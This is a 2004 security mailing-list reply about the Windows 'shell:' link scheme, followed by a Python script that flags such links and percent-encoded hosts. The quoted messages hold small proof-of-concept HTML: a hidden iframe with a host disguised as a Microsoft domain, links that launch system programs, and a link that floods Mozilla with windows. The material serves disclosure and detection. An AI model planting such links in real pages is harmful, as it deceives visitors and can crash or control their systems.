Message-ID: <40EC8589.5000200@interfree.it>
From: giocasati at interfree.it (Komrade)
Subject: shell:windows command question
>> On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
>>
>>
>>
>>> -----snip------
>>> <center><br><br><img src="nocigar.gif"></center>
>>> <center>
>>> <a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
>>> src="http://windowsupdate.microsoft.com%2F.http-equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
>>> [customise as you see fit]
>>> <http://www.malware.com/stockpump.html>
>>> ------end----------
>>> The code above has interest to me.
>>> Even in Mozilla the commands below will work.
>>> <a href=shell:windows\\system32\\calc.exe>1</a>
>>> <a href=shell:windows\system32\calc.exe>2</a>
>>> <a href=shell:windows\system32\winver.exe>4</a>
>>> Just save them to an .html file and run it.
>>> The first one with the double quotes was from bugtraq:
>>> Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
>>> <http://seclists.org/lists/bugtraq/2004/Mar/0188.html>
>>> The links below that will run calc as well as winver.
>>> It seems it calls windows as a virtual dir because c:\winxp is what I have.
>>> I have been playing around to see if cmd.exe will work with it but without luck.
>>> This is what is in the registry.
>>> HKEY_CLASSES_ROOT\Shell
>>> Look in the registry key above. You will find the shell object calls Windows
>>> Explorer with a particular set of arguments.
>>> %SystemRoot%\Explorer.exe /e,/idlist,%I,%L
>>> So this is tied to explorer.exe. This is something involved with the underlying
>>> functions of windows and not IE so to speak because it works in Mozilla or from
>>> the run line.
>>> I'm trying to find out more about the shell: command because I can put a link on
>>> a site that seems to run anything in system32 dir. I'd like to see if you can
>>> pass parameters to it.
>>>
>>> Anyone give me more info on the shell:windows command?
>>> JP
>>>
I found an odd behaviour in my Mozilla browser when I try to execute
this link:
<a href=shell:nofile.xul>click here</a>
(.xul file is a Mozilla XUL Document)
When I click on the link, I see many Mozilla windows opening and
consuming 100% of the CPU. The system became unstable, forcing me to
disconnect from my login.
I have Mozilla 1.7b and Windows XP sp0.
This is not a real security matter, but it's quite annoying.
- Komrade -
- http://unsecure.altervista.org -
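
Added example, not part of the original messages: a small Python audit that parses HTML and flags URL attributes whose scheme would be handed to an operating-system handler (such as the `shell:` links above) or whose host contains percent-encoding (as in the quoted iframe). The allowlist, the function and class names, and the sample markup (modelled on the links in this thread, with a placeholder host) are assumptions of this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Schemes the browser handles itself; this allowlist is an assumption of the example.
INTERNAL = {"http", "https", "ftp", "mailto", "data", "about", "javascript"}
URL_ATTRS = {"href", "src", "action"}
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")

class LinkAuditor(HTMLParser):
    """Collect URL attributes that leave the browser or disguise their host."""
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, scheme, reason, url)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            url = value.strip()
            m = SCHEME_RE.match(url)
            scheme = m.group(1).lower() if m else ""  # "" means a relative URL
            if scheme and scheme not in INTERNAL:
                # e.g. shell: is passed to an external protocol handler
                self.findings.append((tag, scheme, "external-scheme", url))
            elif scheme in ("http", "https") and "%" in urlsplit(url).netloc:
                # percent-encoding in the authority hides the real host
                self.findings.append((tag, scheme, "encoded-host", url))

def audit(html):
    """Return the findings for one HTML document given as a string."""
    auditor = LinkAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed sample: quoted and unquoted attributes, placeholder host.
SAMPLE = r'''
<center><img src="nocigar.gif"></center>
<a href="shell:windows\snakeoil.txt">who goes there</a>
<a href=shell:windows\system32\calc.exe>2</a>
<a href=shell:nofile.xul>click here</a>
<iframe src="http://windowsupdate.microsoft.com%2F.host.example/x.html" style="display:none"></iframe>
<a href="http://example.org/ok.html">fine</a>
'''

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```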